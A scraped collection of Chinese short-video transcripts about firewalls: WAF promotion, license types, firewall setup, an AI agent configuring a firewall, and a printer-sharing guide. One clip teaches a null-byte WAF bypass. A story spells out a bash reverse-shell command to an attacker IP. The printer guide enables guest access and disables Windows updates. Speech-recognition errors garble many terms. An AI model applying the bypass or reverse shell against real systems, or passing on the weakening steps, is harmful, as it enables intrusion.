粉丝38获赞281

推荐一个国产开源免费的外部防火墙神器。不管是个人网站还是公司的网站,最烦的就是被攻击了,而采购一套商业的 wif, 动不动就要几万块钱一年。 今天我要给你推荐的是一个开源版的外部防火墙,它不仅能够精准的拦截色诱注入、叉 s 攻击路径便利代码注入等等常见的攻击,而且呢,针对像 ddos 暴力破解、恶意爬虫,它也非常有一手,能够自动地识别高频请求和异常流量,自动地触发人机验证限流 ip 黑白名单等等,把坏人挡在门外。 更狠的是呢,很多付费软件才有的一键开启返向代理给任意的服务增加登录认证动态,去混淆前端的代码,防爬防逆向等等等等,它都让你免费用。 而且在格式化这方面,它做的也不弱,攻击地图拦截、日制流量趋势清晰可见,异常行为能够秒即告警,网站的安全水位一目了然。而且呢,它是基于宽松的 gpl 三点零 license 开源的, github 上已经有近两万的 star 了,它就是很多公司都在用的,由长亭科技开源的 cfl 雷池,一行命令三十秒部署上线,从此不让黑客越过半步。

今天给大家讲一下防火墙的各种授权有什么用啊?什么情况下买什么授权?第一,防病毒授权干什么用?就拦病毒对吧?拦截病毒他会检测出入的数据包对吧?出入的数据包 对吧?发现问题啊就拦截对吧?那第二个爱拼用特登酷干什么用的?就识别各种流量,比如说什么?那下载流量对吧? 比如说什么视频流量。第三个是什么防攻击授权干什么用的?哦,木马病毒之类的,对,防木马病毒,如果有 circle 注入对吧?那及时拦截嘛。 那第四个 url 特令库有什么用的?识别网站用的对吧?嗯,可以针对网站做特定限制,网站 url 对 吧?做限制对吧?对,那第五个威胁情报授权干什么用的? 就是识别目的流量是否安全的,及时可以更新处理。那这五个啊,我大体写了一下,你看详细的,其实你们可以截图看一下啊。其实第五个里边它分腾讯和安恒的,腾讯干什么用啊?腾讯的主要用于企业,它更新比较快。安恒的它适用于 那个政府,但是他的那个更新虽然没有腾讯快,但是他什么安全系数特别高。那什么时候买什么授权呢?如果你是呃小企业啊,对数据不敏感干嘛?那就买一二三就好了。如果你是政府单位, 对数据敏感,那就买什么,一二三四五最好都买。对,没错,大概就这样。好吧,最后再给大家看一下这个,你们买的时候每个特定户对应什么,你们可以看一下,如果自己有什么需求就买什么样的,对吧?没问题吧?就这样好搞定。

今天给大家出一期安恒的防火墙的开机视频啊,其实调起来也很简单的,就是我后边出了点问题,首先就是下载一个手册,对应着手册里边来调登录他的地址,在代码管理配一个他的同样的地址,用他默认的用户名和密码登上去。 你第一次登录的时候是要强行改密码的,我已经改完了,改完之后我们登进来发现他的界面还是很干净的。 嗯,登了登录上以后,要先给用户上一下他的 license 啊,然后用户买的是全的,然后入侵防御啊,防病毒啊都是有的。嗯,这我就直接快进过了,因为,嗯,不怎么从他的官网里边去下载防火墙的一些 license, 大家肯定都知道啊,我是用离线的方式来给他打的, 就是我先把这个升级包下载到本地,然后直接再给他灌上,打完授权,我们就可以给用户正式的配置了。 其实配起来也非常简单啊,就是配两个口,一个是 trax 的 口,一个是 untax 的 口,把对应的 ip 地址写上,然后把它的 pin 和 h t e p s 打开一会儿,方便我们来验证来用,这儿我就直接快进过了, ip 地址大家肯定都会配啊, 等配完以后我们就开始验证,哦,不对,还是要给他加安全域啊,就是调过防火墙的都知道,就是我们要给防火墙加一个域啊,就是内网口就给他加一个 trust 的 口, trust 的 区域外网口就给他加入到 on trust 的。 嗯, 所有的防火墙其实调法都差不多啊,然后弄完安全玉,我们再给他建两个策略,就是一个是从内到外的,一个是再给他反着建一下,然后从外到内防火墙的策略,大家肯定也会建啊,就是把用户那一些呃,人家买的一些授权啊什么的都给他上上, 其实开这些特征的话,还是要给用户有需要的给他开开这个会消耗他额外的性能。我们就是你建一条策略,正着建一条,反着建一条,这我也是直接给大家宽进过了,建完之后我们一会就开始 给他验证业务所有的初使的配置。建完以后我给自己的电脑开了一个口啊,就是我随便找了一根网线,连到这个防网的上,配一个同网段的地址,拼一下,看看通不通。就是设置的是业务网段哈,网关都不用设,他是二层吧,他是直接可达的, 然后我这拼了一下,第一次不通是因为我拼错地址了,第二次就直接通了,然后我再尝试的登录一下,因为我开了 h t p s 了, 这也是能直接登录的,输上用户名密码就直接就登录这个设备了,这说明我前期配置的没问题,然后我配完之后写上网关,再想验证一下到他的互联口通不通,这时候好玩的来了啊,其实在我这个时候我就开始拼不通了, 我以为是通的,配完之后就走了,哎,怎么可能不通呢?我就开始排错,其实在现实生活中我排了有二十分钟啊,只是剪的时间比较短, 就是我就有点纳闷了,怎么可能不通啊,我说我就检查一遍接口的配置,看看它的有没有配错呀, h t p s 和 pin 有 没有开啊,然后我发现没啥问题,再看一下我的网卡配置的有没有问题,网卡发现地址也是对的,这个时候我就开始看看有没有,有没有学到 erp, 哎,我还学到了我电脑的 a r p, 这说明我配的是没问题,那它怎么还会不通呢?我还是有点纳闷,有点不甘心啊,我知道是一个很简单的问题啊,我又试了一下,还是不通, 嗯,然后我就开始接着拍啊,我配置的也没问题啊,然后也是同网段的到网关也配了,然后我的 ip 地址也没有写错,我就检查策略,策略也检查了,策略也没啥问题,然后我就想打开一下日记看一下,一会实在不行我就看看日记到底是哪不同。 这个时候我就检查到安全玉了,我发现我的这个口没加安全玉,我把这个口加入到安全玉以后,我再拼一下还是不通。那怎么还不通啊?其实这个时候就已经有一点点出汗了,我就检查错了,把日式打开,准备要排错呢,然后我就把上面的有一个行为是阻断的,我也改成是允许 还不通,我寻思要不打四零零吧,但是我知道这是一个很简单的问题,非常非常简单。我可能是哪配错了,我就还是不甘心,又拼,他还不痛 是咋回事呢?这时候我就找着了,我连着无线了,连着无线他直接那个路由就甩出去,他就不通,我把无线关了以后,呃,我又拼了一下,这个时候我检查了一下地址啊,所有的都检查过了, 这一拼就通了啊,就是一个很简单很简单的一个问题,其实当时我就排了有十五分钟、二十分钟的时间, 接下来就很简单了,就是,呃,写一下路由啊,然后再给用户优优化一下配置啊,新化的一些配置就不给大家看了啊,只有只是给大家演示一下这个防火墙是怎么配的,也很简单啊,配起来,希望大家不要犯我的这种错误。好了,本期视频就到这里,拜拜。拜拜。

这个咱们看这个电脑防火墙怎么关闭,因为有好多呗,他玩游戏呗,装一些个外挂或是那个脚本一类的,被防火墙给拦截了。这个咱们说一下怎么彻底的把这个防火墙给关闭了? 现在咱们看电脑,咱们把鼠标呗放这个网络这点右键,然后点这个属性, 在这里边呗,都能看见这个防火墙的 windows 防火墙,然后咱们打印机点开它, 在这有一个启动或关闭 windows 防火墙,咱们点开它,点开它 在下边直接关闭了就可以了。直接关完了之后呗,咱们一定要直接有一个确定一,一定要点上这个确定啊,点了点,点这个确定,如果你要不点这个确定的话,你防风枪相当于没有关。

现在 open core 正在给我配置防火墙,就是这台可以看到正在执行配置命令。我们来看一下提示词,我们让他通过我自己编写的技能连接华山防火墙,先登录防火墙查看一下当前配置, 然后再告诉他,即一杠零杠一做外网口自动获取 ip 地址,防火墙三口作为档口,并配置档口, ip 地址再发给 opencool, 让他先生成配置。 我们来看一下这就是它生成的配置,基本上都是正确的。 ip 地址,安全区域,还有 dsp 服务器配置,有些地方不太满意的,让它修改一下就行了。 比如这里 nat 配置,我习惯用 nat 奥特曼的,告诉它修改就行了。 脚本修改好以后直接让他配置,配置好以后让他拼一下,二二三点五点五点五,同不同可以看到他自己在登录设备, 然后对设备进行配置,配置好以后根据我们的要求拼一下,二二三点五点五点五,可以看到配置好了,配置好以后它还会输出一个总结 提示,华商防火墙配置完成,联通新测试,无丢包防火墙也可以正常上网,这个效率其实还挺可以的,比我自己编辑脚本还快。

每天学一点技术,今日分享,网络出口用防火墙还是路由器?大家好,欢迎来到今天的网络技术讨论环节。今天我们要讨论的话题是网络出口应该使用防火墙还是路由器, 这是一个很好的问题。防火墙和路由器在网络出口中各有其用途,防火墙主要用于网络安全, 提供访问控制、入侵检测等功能,而路由器则负责数据包的转发和路由选择。那么在实际应用中,我们应该如何选择呢? 这取决于您的具体需求。如果您的主要关注点是安全性,那么防火墙是更好的选择。如果您需要高效的网络连接和路由功能,路由器可能更适合。 有没有一种方案可以兼顾两者的优势呢?当然可以,现在很多高端设备都集成了防火墙和路由器的功能, 成为 utm 统一威胁管理设备。这种设备可以同时提供安全防护和路由功能,适合大多数企业环境。


上期教文永远不掉线的 l p d 共享打印机,今天咱们来填坑!怎么拯救动不动就报、没有权限的传统 ip 直连法?教你打造全公司小白一键双击、全自动装驱动的完美共享环境。不过在正式实操前,先给上期视频打个硬核补丁。 评论区有懂行的大神指出,只在电脑上固定 ip, 一 旦路由器重启,可能会引发 ip 冲突。最完美的方案是进路由器后台做 mac 与 ip 绑定。这里非常感谢大神的指正, 我原本想把这部分揉进今天这期,但发现时常直接奔着电影去了,所以我决定单独出一期路由器底层绑定的加餐视频,给大家彻底把坑填平。至于今天这期,为了照顾不想折腾路由器的小伙伴,咱们依然采用在主机上手动固定 ip 的 简易方案。 不过为了防坑,我教大家一个偷懒神器,大家在固定 ip 的 时候,尽量把最后一位数字设置在二二二以后,比如幺九二点幺六八点幺点二二二这个号段通常在路由器的自动分配池之外,能最大程度避开 ip 冲突。 好了,补丁打完,因为今天要填的坑比较多,为了防止大家跟着做的时候迷路,我把整个破解流程规划成了四大核心模块,网络穿透、身份寻址、策略、引擎、系统加固。大家先在脑子里建个框架,准备好了吗?先赞后看,咱们直接进入第一模块,网络穿透。 第一步,开启无密码网络共享。鼠标右键点击屏幕左下角的开始菜单,选择搜索,输入控制面板点击,打开控制面板,进入网络和 internet, 点击网络和共享中心,点击左侧的更改高级共享设置专用网络里勾选起用网络,发现起用文件和打印机共享 所有网络中找到密码保护的共享,务必勾选关闭密码保护共享,点击保存更改。第二步,防火墙放行右键点击开始图标选择搜索,输入防火墙,点击进入, 点击左侧允许应用或功能通过防火墙在列表中找到文件和打印机共享,勾选最左侧方框,并将右侧专用和公用全部勾选保存 模块二,身份寻址第三步,唤醒 guest 账户,右键点击桌面,此电脑选择管理,依次展开左侧的系统工具,本地用户和组用户 在右侧找到 guest 账户,双击它取消勾选账户已禁用,点击确定 模块三策略引擎第四步,解除组策略封杀,右击左下角的开始选择运行,输入 secpo mess 回车,打开本地安全策略, 踢出黑名单,展开本地策略用户权限分配,双击右侧地,拒绝从网络访问这台计算机,如果列表里有 guest 或来宾,选中它,点击删除,确定 加入白名单。同样在这个列表里,双击从网络访问此计算机,确认列表里有 everyone 或 guest, 如果没有,点击添加用户或组,手动打字加进去。 修改安全模型,展开左侧的本地策略安全选项,双击网络访问本地账户的共享和安全模型,下拉改为仅来宾对本地用户进行身份验证,其身份未来宾确定。 双击账户,来宾账户状态确认是已启动模块四,系统加固第五步,固定 ip, 左键点击左下角开始输入控制面板,点击打开控制面板, 点击网络和 internet, 点击网络和共享中心,点击以太网,点击详细信息,记下这里的 i p v 四地址。 i p v 四子网眼码 i p v 四默认网关 d n s 服务器带会要用关闭窗口,点击属性, 双击列表里的 internet 协议版本。四、勾选使用下面的 ip 地址,将刚才记下的那几串数字依次输入对应的空白处, 你要输入两百二十二货以后勾选使用下面的 d n s 服务器地址,填写刚才记下的 d n s 服务器地址,点击确定。第六步,禁用系统更新布置这段代码,点击左下角开始按下键盘上的 c m d, 右键点击命令符提示行,选择以管理员的身份运行,按下键盘上的 ctrl 加 v 粘贴这段代码回车,点击左下角的开始选择设置,点击更新和安全, 我们会看到更新已暂停,恢复时间二零三九年。这段代码我会放在评论区。打印机共享与客户机秒连,重新打开控制面板,点击设备和打印机, 找到你的打印机图标,右键选择打印机属性,切换到共享,勾选共享这台打印机设置完成,点击应用 至此,主机上的设置已全部完成。重点来了,这时候一定要重启电脑,接下来咱们去客户机上用刚才固定的那个 ip 地址去连接打印机。客户机上右键点击左下角的开始弹出的菜单中选择运行,输入我们记下的主机上的 ip 地址,确定 弹出的页面中右键点击打印机图标选择连接。连接成功,咱们现在去设备和打印机里检查一下战果, 大家看,这台打印机已经乖乖出现在列表里就位了,随时可以开打。兄弟们,到这里,咱们关于局域网共享打印机的上下两级终极教程就彻底完结了。咱们复习一下传统 ip 直连大众普及版主打一个全自动发驱动,一键双击,让你舒舒服服当甩手掌柜。 l p d 协议企业稳定版主打一个 v i p 专属通道,永远不掉线。另外值得一提的是,这两招同时用在同一台主机上绝对不冲突, 学会这一手,在遇到共享打印机时,想怎么连就怎么连!整理这套终极避坑指南,真的非常掉头发,觉得有用的朋友千万别忘了点赞、关注加收藏!强烈建议把这两期视频转发给你们公司的行政或者网管群里,咱们下期硬核干货再见!

正面强攻过不去,别急,在尾巴上加个零零,让 w a f 当场脑溢血。看好了, w a f 是 用正则匹配来检测攻击的,我们再攻击,再和末尾加上零零, w a f 会把它当成普通字母放过, 但到了后端服务器,比如用 c c 加加写的零零是字母串结束缚,它,后面的所有检测代码直接被截断失效了。 这就像是安检员 w a f 和老板 server 对 危险品的定义不一样,安检员放行了一个包裹,但老板一看到包裹里的零零这个东西,就直接把包裹后面的内容全扔了。黑客利用的就是这个信息不对称,这种利用底层逻辑的骚操作,才是渗透测试的灵魂。

你知道为什么 linux 的 防火墙永远挡不住那句八十 i 的 诅咒吗?韩丽家的服务器数据悄悄外流,防火墙日志却一片空白,他必须揪出那个隐身黑客。韩丽打开终端,敲响 netstar, 一 条异常连接赫然在目。状态显示 established, 但不是从外向内,而是服务器主动连向陌生外皮。 韩丽瞬间明白,这是反弹 shell。 什么是反弹 shell? 防火强项,严格的门卫,外人进不来,但你可以主动打电话出去。黑客先在外面开监听端口,然后让服务器执行一条命令, bash i great 单 and dash tcp。 黑客 ip 端口零大于一。 这条命令让服务器主动连向黑客,建立完整的双向通道,服务器就成了遥控玩具。韩丽用 ps 命令找到进城 id, 发现是个伪装成系统服务的 boss, key 结束进城。但韩丽知道这只是制标检查。 cron tap 果然有定时任务, 每小时执行一次反弹脚本,删除任务,搜索脚本,在 t m p 目录找到文件,清除所有痕迹。但问题还没完,黑客最初怎么进来的?检查 web 日记,发现文件上传漏洞。黑客上传了 web shell, 然后执行了反弹命令。 韩丽修补漏洞,加强权限设置监控规则。异常外连立即报警,韩丽还部署了密关。几天后,警报再次响起,同一个 ip 又来了。韩丽这次没有阻断,而是悄悄监控,记录所有操作,然后反向追踪,找到真实 ip。 韩丽终于明白,反弹 shell 只是冰山一角, 还有 d n s 隧道, h t t p 隧道,利用合法协议隐藏恶意流量。韩丽合上笔记本,网络世界永不眠,真正的战斗才刚刚开始!
